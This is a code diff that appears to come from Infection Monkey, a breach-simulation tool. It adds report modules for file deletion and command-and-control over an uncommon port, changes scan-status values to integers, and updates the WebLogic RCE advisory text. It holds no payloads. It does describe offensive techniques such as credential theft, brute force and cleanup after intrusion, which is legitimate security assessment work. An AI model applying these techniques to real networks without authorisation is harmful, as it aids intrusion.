@ -97,7 +97,7 @@ TELEM_PROCESS_DICT = \
|
|||
'state': TelemetryFeed.get_state_telem_brief,
|
||||
'exploit': TelemetryFeed.get_exploit_telem_brief,
|
||||
'scan': TelemetryFeed.get_scan_telem_brief,
|
||||
'system_info_collection': TelemetryFeed.get_systeminfo_telem_brief,
|
||||
'system_info': TelemetryFeed.get_systeminfo_telem_brief,
|
||||
'trace': TelemetryFeed.get_trace_telem_brief,
|
||||
'post_breach': TelemetryFeed.get_post_breach_telem_brief,
|
||||
'attack': TelemetryFeed.get_attack_telem_brief
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
import logging
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.services.attack.technique_reports import T1210, T1197, T1110, T1075, T1003, T1059, T1086, T1082
|
||||
from monkey_island.cc.services.attack.technique_reports import T1145, T1035, T1129, T1106
|
||||
from monkey_island.cc.services.attack.technique_reports import T1145, T1035, T1129, T1106, T1107, T1065
|
||||
from monkey_island.cc.services.attack.attack_config import AttackConfig
|
||||
from monkey_island.cc.database import mongo
|
||||
|
||||
|
@ -20,7 +21,9 @@ TECHNIQUES = {'T1210': T1210.T1210,
|
|||
'T1145': T1145.T1145,
|
||||
'T1035': T1035.T1035,
|
||||
'T1129': T1129.T1129,
|
||||
'T1106': T1106.T1106}
|
||||
'T1106': T1106.T1106,
|
||||
'T1107': T1107.T1107,
|
||||
'T1065': T1065.T1065}
|
||||
|
||||
REPORT_NAME = 'new_report'
|
||||
|
||||
|
@ -35,7 +38,13 @@ class AttackReportService:
|
|||
Generates new report based on telemetries, replaces old report in db with new one.
|
||||
:return: Report object
|
||||
"""
|
||||
report = {'techniques': {}, 'latest_telem_time': AttackReportService.get_latest_attack_telem_time(), 'name': REPORT_NAME}
|
||||
report =\
|
||||
{
|
||||
'techniques': {},
|
||||
'meta': {'latest_monkey_modifytime': Monkey.get_latest_modifytime()},
|
||||
'name': REPORT_NAME
|
||||
}
|
||||
|
||||
for tech_id, value in AttackConfig.get_technique_values().items():
|
||||
if value:
|
||||
try:
|
||||
|
@ -60,12 +69,13 @@ class AttackReportService:
|
|||
Gets latest report (by retrieving it from db or generating a new one).
|
||||
:return: report dict.
|
||||
"""
|
||||
return AttackReportService.generate_new_report()
|
||||
if AttackReportService.is_report_generated():
|
||||
telem_time = AttackReportService.get_latest_attack_telem_time()
|
||||
monkey_modifytime = Monkey.get_latest_modifytime()
|
||||
latest_report = mongo.db.attack_report.find_one({'name': REPORT_NAME})
|
||||
if telem_time and latest_report['latest_telem_time'] and telem_time == latest_report['latest_telem_time']:
|
||||
report_modifytime = latest_report['meta']['latest_monkey_modifytime']
|
||||
if monkey_modifytime and report_modifytime and monkey_modifytime == report_modifytime:
|
||||
return latest_report
|
||||
return AttackReportService.generate_new_report()
|
||||
|
||||
@staticmethod
|
||||
def is_report_generated():
|
||||
|
|
|
@ -91,6 +91,15 @@ SCHEMA = {
|
|||
"necessary": True,
|
||||
"description": "Adversaries may abuse BITS to download, execute, "
|
||||
"and even clean up after running malicious code."
|
||||
},
|
||||
"T1107": {
|
||||
"title": "T1107 File Deletion",
|
||||
"type": "bool",
|
||||
"value": True,
|
||||
"necessary": True,
|
||||
"description": "Adversaries may remove files over the course of an intrusion "
|
||||
"to keep their footprint low or remove them at the end as part "
|
||||
"of the post-intrusion cleanup process."
|
||||
}
|
||||
}
|
||||
},
|
||||
|
@ -158,5 +167,19 @@ SCHEMA = {
|
|||
}
|
||||
}
|
||||
},
|
||||
"command_and_control": {
|
||||
"title": "Command and Control",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"T1065": {
|
||||
"title": "T1065 Uncommonly used port",
|
||||
"type": "bool",
|
||||
"value": True,
|
||||
"necessary": True,
|
||||
"description": "Adversaries may conduct C2 communications over a non-standard "
|
||||
"port to bypass proxies and firewalls that have been improperly configured."
|
||||
}
|
||||
}
|
||||
},
|
||||
}
|
||||
}
|
||||
|
|
|
@ -20,8 +20,8 @@ class T1003(AttackTechnique):
|
|||
def get_report_data():
|
||||
data = {'title': T1003.technique_title()}
|
||||
if mongo.db.telemetry.count_documents(T1003.query):
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data.update(T1003.get_message_and_status(status))
|
||||
return data
|
||||
|
|
|
@ -27,8 +27,8 @@ class T1059(AttackTechnique):
|
|||
cmd_data = list(mongo.db.telemetry.aggregate(T1059.query))
|
||||
data = {'title': T1059.technique_title(), 'cmds': cmd_data}
|
||||
if cmd_data:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data.update(T1059.get_message_and_status(status))
|
||||
return data
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
from monkey_island.cc.services.attack.technique_reports import AttackTechnique
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from monkey_island.cc.services.config import ConfigService
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
|
||||
class T1065(AttackTechnique):
|
||||
|
||||
tech_id = "T1065"
|
||||
unscanned_msg = ""
|
||||
scanned_msg = ""
|
||||
used_msg = ""
|
||||
message = "Monkey used port %s to communicate to C2 server."
|
||||
|
||||
@staticmethod
|
||||
def get_report_data():
|
||||
port = ConfigService.get_config_value(['cnc', 'servers', 'current_server']).split(':')[1]
|
||||
T1065.used_msg = T1065.message % port
|
||||
return T1065.get_base_data_by_status(ScanStatus.USED.value)
|
|
@ -35,10 +35,10 @@ class T1075(AttackTechnique):
|
|||
successful_logins = list(mongo.db.telemetry.aggregate(T1075.query))
|
||||
data.update({'successful_logins': successful_logins})
|
||||
if successful_logins:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
elif mongo.db.telemetry.count_documents(T1075.login_attempt_query):
|
||||
status = ScanStatus.SCANNED
|
||||
status = ScanStatus.SCANNED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data.update(T1075.get_message_and_status(status))
|
||||
return data
|
||||
|
|
|
@ -40,8 +40,8 @@ class T1082(AttackTechnique):
|
|||
system_info = list(mongo.db.telemetry.aggregate(T1082.query))
|
||||
data.update({'system_info': system_info})
|
||||
if system_info:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data.update(T1082.get_message_and_status(status))
|
||||
return data
|
||||
|
|
|
@ -29,8 +29,8 @@ class T1086(AttackTechnique):
|
|||
cmd_data = list(mongo.db.telemetry.aggregate(T1086.query))
|
||||
data = {'title': T1086.technique_title(), 'cmds': cmd_data}
|
||||
if cmd_data:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data.update(T1086.get_message_and_status(status))
|
||||
return data
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
from monkey_island.cc.database import mongo
|
||||
from monkey_island.cc.services.attack.technique_reports import AttackTechnique
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
|
||||
class T1107(AttackTechnique):
|
||||
tech_id = "T1107"
|
||||
unscanned_msg = ""
|
||||
scanned_msg = "Monkey tried to delete files on systems in the network, but failed."
|
||||
used_msg = "Monkey successfully deleted files on systems in the network."
|
||||
|
||||
query = [{'$match': {'telem_category': 'attack',
|
||||
'data.technique': 'T1107'}},
|
||||
{'$lookup': {'from': 'monkey',
|
||||
'localField': 'monkey_guid',
|
||||
'foreignField': 'guid',
|
||||
'as': 'monkey'}},
|
||||
{'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]},
|
||||
'status': '$data.status',
|
||||
'path': '$data.path'}},
|
||||
{'$addFields': {'_id': 0,
|
||||
'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'},
|
||||
'monkey': 0}},
|
||||
{'$group': {'_id': {'machine': '$machine', 'status': '$status', 'path': '$path'}}}]
|
||||
|
||||
@staticmethod
|
||||
def get_report_data():
|
||||
data = T1107.get_tech_base_data()
|
||||
deleted_files = list(mongo.db.telemetry.aggregate(T1107.query))
|
||||
data.update({'deleted_files': deleted_files})
|
||||
return data
|
|
@ -35,11 +35,11 @@ class T1110(AttackTechnique):
|
|||
result['successful_creds'].append(T1110.parse_creds(attempt))
|
||||
|
||||
if succeeded:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
elif attempts:
|
||||
status = ScanStatus.SCANNED
|
||||
status = ScanStatus.SCANNED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data = T1110.get_base_data_by_status(status)
|
||||
# Remove data with no successful brute force attempts
|
||||
attempts = [attempt for attempt in attempts if attempt['attempts']]
|
||||
|
|
|
@ -23,9 +23,9 @@ class T1145(AttackTechnique):
|
|||
ssh_info = list(mongo.db.telemetry.aggregate(T1145.query))
|
||||
|
||||
if ssh_info:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data = T1145.get_base_data_by_status(status)
|
||||
data.update({'ssh_info': ssh_info})
|
||||
return data
|
||||
|
|
|
@ -18,11 +18,11 @@ class T1210(AttackTechnique):
|
|||
scanned_services = T1210.get_scanned_services()
|
||||
exploited_services = T1210.get_exploited_services()
|
||||
if exploited_services:
|
||||
status = ScanStatus.USED
|
||||
status = ScanStatus.USED.value
|
||||
elif scanned_services:
|
||||
status = ScanStatus.SCANNED
|
||||
status = ScanStatus.SCANNED.value
|
||||
else:
|
||||
status = ScanStatus.UNSCANNED
|
||||
status = ScanStatus.UNSCANNED.value
|
||||
data.update(T1210.get_message_and_status(status))
|
||||
data.update({'scanned_services': scanned_services, 'exploited_services': exploited_services})
|
||||
return data
|
||||
|
|
|
@ -50,38 +50,38 @@ class AttackTechnique(object):
|
|||
def technique_status(cls):
|
||||
"""
|
||||
Gets the status of a certain attack technique.
|
||||
:return: ScanStatus Enum object
|
||||
:return: ScanStatus numeric value
|
||||
"""
|
||||
if mongo.db.telemetry.find_one({'telem_category': 'attack',
|
||||
'data.status': ScanStatus.USED.value,
|
||||
'data.technique': cls.tech_id}):
|
||||
return ScanStatus.USED
|
||||
return ScanStatus.USED.value
|
||||
elif mongo.db.telemetry.find_one({'telem_category': 'attack',
|
||||
'data.status': ScanStatus.SCANNED.value,
|
||||
'data.technique': cls.tech_id}):
|
||||
return ScanStatus.SCANNED
|
||||
return ScanStatus.SCANNED.value
|
||||
else:
|
||||
return ScanStatus.UNSCANNED
|
||||
return ScanStatus.UNSCANNED.value
|
||||
|
||||
@classmethod
|
||||
def get_message_and_status(cls, status):
|
||||
"""
|
||||
Returns a dict with attack technique's message and status.
|
||||
:param status: Enum type value from common/attack_utils.py
|
||||
:param status: Enum from common/attack_utils.py integer value
|
||||
:return: Dict with message and status
|
||||
"""
|
||||
return {'message': cls.get_message_by_status(status), 'status': status.name}
|
||||
return {'message': cls.get_message_by_status(status), 'status': status}
|
||||
|
||||
@classmethod
|
||||
def get_message_by_status(cls, status):
|
||||
"""
|
||||
Picks a message to return based on status.
|
||||
:param status: Enum type value from common/attack_utils.py
|
||||
:param status: Enum from common/attack_utils.py integer value
|
||||
:return: message string
|
||||
"""
|
||||
if status == ScanStatus.UNSCANNED:
|
||||
if status == ScanStatus.UNSCANNED.value:
|
||||
return cls.unscanned_msg
|
||||
elif status == ScanStatus.SCANNED:
|
||||
elif status == ScanStatus.SCANNED.value:
|
||||
return cls.scanned_msg
|
||||
else:
|
||||
return cls.used_msg
|
||||
|
@ -97,12 +97,12 @@ class AttackTechnique(object):
|
|||
def get_tech_base_data(cls):
|
||||
"""
|
||||
Gathers basic attack technique data into a dict.
|
||||
:return: dict E.g. {'message': 'Brute force used', 'status': 'Used', 'title': 'T1110 Brute force'}
|
||||
:return: dict E.g. {'message': 'Brute force used', 'status': 2, 'title': 'T1110 Brute force'}
|
||||
"""
|
||||
data = {}
|
||||
status = cls.technique_status()
|
||||
title = cls.technique_title()
|
||||
data.update({'status': status.name,
|
||||
data.update({'status': status,
|
||||
'title': title,
|
||||
'message': cls.get_message_by_status(status)})
|
||||
return data
|
||||
|
|
|
@ -89,7 +89,7 @@ SCHEMA = {
|
|||
"enum": [
|
||||
"WebLogicExploiter"
|
||||
],
|
||||
"title": "Oracle Web Logic Exploiter"
|
||||
"title": "WebLogic Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
|
|
|
@ -308,10 +308,6 @@ class NodeService:
|
|||
def is_monkey_finished_running():
|
||||
return NodeService.is_any_monkey_exists() and not NodeService.is_any_monkey_alive()
|
||||
|
||||
@staticmethod
|
||||
def get_latest_modified_monkey():
|
||||
return mongo.db.monkey.find({}).sort('modifytime', -1).limit(1)
|
||||
|
||||
@staticmethod
|
||||
def add_credentials_to_monkey(monkey_id, creds):
|
||||
mongo.db.monkey.update(
|
||||
|
|
|
@ -10,6 +10,7 @@ from enum import Enum
|
|||
from six import text_type
|
||||
|
||||
from monkey_island.cc.database import mongo
|
||||
from monkey_island.cc.models import Monkey
|
||||
from monkey_island.cc.report_exporter_manager import ReportExporterManager
|
||||
from monkey_island.cc.services.config import ConfigService
|
||||
from monkey_island.cc.services.edge import EdgeService
|
||||
|
@ -171,7 +172,7 @@ class ReportService:
|
|||
PASS_TYPE_DICT = {'password': 'Clear Password', 'lm_hash': 'LM hash', 'ntlm_hash': 'NTLM hash'}
|
||||
creds = []
|
||||
for telem in mongo.db.telemetry.find(
|
||||
{'telem_category': 'system_info_collection', 'data.credentials': {'$exists': True}},
|
||||
{'telem_category': 'system_info', 'data.credentials': {'$exists': True}},
|
||||
{'data.credentials': 1, 'monkey_guid': 1}
|
||||
):
|
||||
monkey_creds = telem['data']['credentials']
|
||||
|
@ -199,7 +200,7 @@ class ReportService:
|
|||
"""
|
||||
creds = []
|
||||
for telem in mongo.db.telemetry.find(
|
||||
{'telem_category': 'system_info_collection', 'data.ssh_info': {'$exists': True}},
|
||||
{'telem_category': 'system_info', 'data.ssh_info': {'$exists': True}},
|
||||
{'data.ssh_info': 1, 'monkey_guid': 1}
|
||||
):
|
||||
origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname']
|
||||
|
@ -220,7 +221,7 @@ class ReportService:
|
|||
"""
|
||||
creds = []
|
||||
for telem in mongo.db.telemetry.find(
|
||||
{'telem_category': 'system_info_collection', 'data.Azure': {'$exists': True}},
|
||||
{'telem_category': 'system_info', 'data.Azure': {'$exists': True}},
|
||||
{'data.Azure': 1, 'monkey_guid': 1}
|
||||
):
|
||||
azure_users = telem['data']['Azure']['usernames']
|
||||
|
@ -382,7 +383,7 @@ class ReportService:
|
|||
@staticmethod
|
||||
def get_monkey_subnets(monkey_guid):
|
||||
network_info = mongo.db.telemetry.find_one(
|
||||
{'telem_category': 'system_info_collection', 'monkey_guid': monkey_guid},
|
||||
{'telem_category': 'system_info', 'monkey_guid': monkey_guid},
|
||||
{'data.network_info.networks': 1}
|
||||
)
|
||||
if network_info is None:
|
||||
|
@ -714,7 +715,7 @@ class ReportService:
|
|||
config_users = ReportService.get_config_users()
|
||||
config_passwords = ReportService.get_config_passwords()
|
||||
cross_segment_issues = ReportService.get_cross_segment_issues()
|
||||
monkey_latest_modify_time = list(NodeService.get_latest_modified_monkey())[0]['modifytime']
|
||||
monkey_latest_modify_time = Monkey.get_latest_modifytime()
|
||||
|
||||
report = \
|
||||
{
|
||||
|
@ -779,7 +780,7 @@ class ReportService:
|
|||
|
||||
if latest_report_doc:
|
||||
report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime']
|
||||
latest_monkey_modifytime = NodeService.get_latest_modified_monkey()[0]['modifytime']
|
||||
latest_monkey_modifytime = Monkey.get_latest_modifytime()
|
||||
return report_latest_modifytime == latest_monkey_modifytime
|
||||
|
||||
return False
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -53,7 +53,6 @@
|
|||
"minimist": "^1.2.0",
|
||||
"mocha": "^5.2.0",
|
||||
"null-loader": "^0.1.1",
|
||||
"open": "0.0.5",
|
||||
"phantomjs-prebuilt": "^2.1.16",
|
||||
"react-addons-test-utils": "^15.6.2",
|
||||
"react-hot-loader": "^4.3.11",
|
||||
|
|
|
@ -4,7 +4,6 @@ require('core-js/fn/object/assign');
|
|||
const webpack = require('webpack');
|
||||
const WebpackDevServer = require('webpack-dev-server');
|
||||
const config = require('./webpack.config');
|
||||
const open = require('open');
|
||||
|
||||
/**
|
||||
* Flag indicating whether webpack compiled for the first time.
|
||||
|
|
|
@ -35,3 +35,9 @@ export function getUsageColumns() {
|
|||
accessor: x => x._id.usage,
|
||||
style: { 'whiteSpace': 'unset' }}]
|
||||
}])}
|
||||
|
||||
export const scanStatus = {
|
||||
UNSCANNED: 0,
|
||||
SCANNED: 1,
|
||||
USED: 2
|
||||
};
|
||||
|
|
|
@ -2,6 +2,7 @@ import React from 'react';
|
|||
import '../../../styles/Collapse.scss'
|
||||
import '../../report-components/StolenPasswords'
|
||||
import StolenPasswordsComponent from "../../report-components/StolenPasswords";
|
||||
import {scanStatus} from "./Helpers"
|
||||
|
||||
|
||||
class T1003 extends React.Component {
|
||||
|
@ -15,7 +16,7 @@ class T1003 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.status === 'USED' ?
|
||||
{this.props.data.status === scanStatus.USED ?
|
||||
<StolenPasswordsComponent data={this.props.reportData.glance.stolen_creds.concat(this.props.reportData.glance.ssh_keys)}/>
|
||||
: ""}
|
||||
</div>
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachine } from "./Helpers"
|
||||
import { renderMachine, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1059 extends React.Component {
|
||||
|
@ -25,7 +25,7 @@ class T1059 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.status === 'USED' ?
|
||||
{this.props.data.status === scanStatus.USED ?
|
||||
<ReactTable
|
||||
columns={T1059.getCommandColumns()}
|
||||
data={this.props.data.cmds}
|
||||
|
|
|
@ -0,0 +1,16 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
|
||||
|
||||
class T1065 extends React.Component {
|
||||
|
||||
render() {
|
||||
return (
|
||||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
export default T1065;
|
|
@ -1,7 +1,7 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachine } from "./Helpers"
|
||||
import { renderMachine, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1075 extends React.Component {
|
||||
|
@ -34,7 +34,7 @@ class T1075 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.status === 'USED' ?
|
||||
{this.props.data.status !== scanStatus.UNSCANNED ?
|
||||
<ReactTable
|
||||
columns={T1075.getHashColumns()}
|
||||
data={this.props.data.successful_logins}
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachineFromSystemData } from "./Helpers"
|
||||
import { renderMachineFromSystemData, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1082 extends React.Component {
|
||||
|
@ -33,7 +33,7 @@ class T1082 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.status === 'USED' ?
|
||||
{this.props.data.status === scanStatus.USED ?
|
||||
<ReactTable
|
||||
columns={T1082.getSystemInfoColumns()}
|
||||
data={this.props.data.system_info}
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachine } from "./Helpers"
|
||||
import { renderMachine, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1086 extends React.Component {
|
||||
|
@ -25,7 +25,7 @@ class T1086 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.status === 'USED' ?
|
||||
{this.props.data.status === scanStatus.USED ?
|
||||
<ReactTable
|
||||
columns={T1086.getPowershellColumns()}
|
||||
data={this.props.data.cmds}
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachineFromSystemData, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1107 extends React.Component {
|
||||
|
||||
constructor(props) {
|
||||
super(props);
|
||||
}
|
||||
|
||||
static renderDelete(status){
|
||||
if(status === scanStatus.USED){
|
||||
return <span>Yes</span>
|
||||
} else {
|
||||
return <span>No</span>
|
||||
}
|
||||
}
|
||||
|
||||
static getDeletedFileColumns() {
|
||||
return ([{
|
||||
columns: [
|
||||
{Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x._id.machine), style: { 'whiteSpace': 'unset' }},
|
||||
{Header: 'Path', id: 'path', accessor: x => x._id.path, style: { 'whiteSpace': 'unset' }},
|
||||
{Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status),
|
||||
style: { 'whiteSpace': 'unset' }, width: 160}]
|
||||
}])};
|
||||
|
||||
render() {
|
||||
return (
|
||||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.deleted_files.length !== 0 ?
|
||||
<ReactTable
|
||||
columns={T1107.getDeletedFileColumns()}
|
||||
data={this.props.data.deleted_files}
|
||||
showPagination={false}
|
||||
defaultPageSize={this.props.data.deleted_files.length}
|
||||
/> : ""}
|
||||
</div>
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
export default T1107;
|
|
@ -1,7 +1,7 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachine } from "./Helpers"
|
||||
import { renderMachine, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1110 extends React.Component {
|
||||
|
@ -32,7 +32,7 @@ class T1110 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{(this.props.data.status === 'SCANNED' || this.props.data.status === 'USED') ?
|
||||
{this.props.data.status !== scanStatus.UNSCANNED ?
|
||||
<ReactTable
|
||||
columns={T1110.getServiceColumns()}
|
||||
data={this.props.data.services}
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import React from 'react';
|
||||
import '../../../styles/Collapse.scss'
|
||||
import ReactTable from "react-table";
|
||||
import { renderMachineFromSystemData } from "./Helpers"
|
||||
import { renderMachineFromSystemData, scanStatus } from "./Helpers"
|
||||
|
||||
|
||||
class T1145 extends React.Component {
|
||||
|
@ -38,7 +38,7 @@ class T1145 extends React.Component {
|
|||
<div>
|
||||
<div>{this.props.data.message}</div>
|
||||
<br/>
|
||||
{this.props.data.status === 'USED' ?
|
||||
{this.props.data.status === scanStatus.USED ?
|
||||
<ReactTable
|
||||
columns={T1145.getKeysInfoColumns()}
|
||||
data={this.props.data.ssh_info}
|
||||
|
|
|
@ -343,9 +343,7 @@ class ReportPageComponent extends AuthComponent {
|
|||
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
|
||||
CVE-2017-5638</a>)</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
|
||||
<li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
|
||||
href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
|
||||
CVE-2017-10271</a>)</li> : null }
|
||||
<li>Oracle WebLogic servers are susceptible to a remote code execution vulnerability.</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.HADOOP] ?
|
||||
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
|
||||
|
@ -889,16 +887,15 @@ class ReportPageComponent extends AuthComponent {
|
|||
generateWebLogicIssue(issue) {
|
||||
return (
|
||||
<li>
|
||||
Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
|
||||
critical patch updates.</a> Or update to the latest version. Vulnerable versions are
|
||||
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
|
||||
Update Oracle WebLogic server to the latest supported version.
|
||||
<CollapsibleWellComponent>
|
||||
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
|
||||
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
|
||||
className="label label-danger">remote code execution</span> attack.
|
||||
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
|
||||
className="label label-danger">remote code execution</span> attacks.
|
||||
<br/>
|
||||
The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
|
||||
(subcomponent: WLS Security).
|
||||
The attack was made possible due to one of the following vulnerabilities:
|
||||
<a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271"}> CVE-2017-10271</a> or
|
||||
<a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725"}> CVE-2019-2725</a>
|
||||
</CollapsibleWellComponent>
|
||||
</li>
|
||||
);
|
||||
|
|
|
@ -4,6 +4,7 @@ import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
|
|||
import {edgeGroupToColor, options} from 'components/map/MapOptions';
|
||||
import '../../styles/Collapse.scss';
|
||||
import AuthComponent from '../AuthComponent';
|
||||
import {scanStatus} from "../attack/techniques/Helpers";
|
||||
import Collapse from '@kunukn/react-collapse';
|
||||
import T1210 from '../attack/techniques/T1210';
|
||||
import T1197 from '../attack/techniques/T1197';
|
||||
|
@ -14,6 +15,8 @@ import T1059 from "../attack/techniques/T1059";
|
|||
import T1086 from "../attack/techniques/T1086";
|
||||
import T1082 from "../attack/techniques/T1082";
|
||||
import T1145 from "../attack/techniques/T1145";
|
||||
import T1107 from "../attack/techniques/T1107";
|
||||
import T1065 from "../attack/techniques/T1065";
|
||||
import T1035 from "../attack/techniques/T1035";
|
||||
import T1129 from "../attack/techniques/T1129";
|
||||
import T1106 from "../attack/techniques/T1106";
|
||||
|
@ -30,7 +33,9 @@ const tech_components = {
|
|||
'T1145': T1145,
|
||||
'T1035': T1035,
|
||||
'T1129': T1129,
|
||||
'T1106': T1106
|
||||
'T1106': T1106,
|
||||
'T1107': T1107,
|
||||
'T1065': T1065
|
||||
};
|
||||
|
||||
const classNames = require('classnames');
|
||||
|
@ -81,9 +86,9 @@ class AttackReportPageComponent extends AuthComponent {
|
|||
|
||||
getComponentClass(tech_id){
|
||||
switch (this.state.report[tech_id].status) {
|
||||
case 'SCANNED':
|
||||
case scanStatus.SCANNED:
|
||||
return 'collapse-info';
|
||||
case 'USED':
|
||||
case scanStatus.USED:
|
||||
return 'collapse-danger';
|
||||
default:
|
||||
return 'collapse-default';
|
||||
|
|
Loading…
Reference in New Issue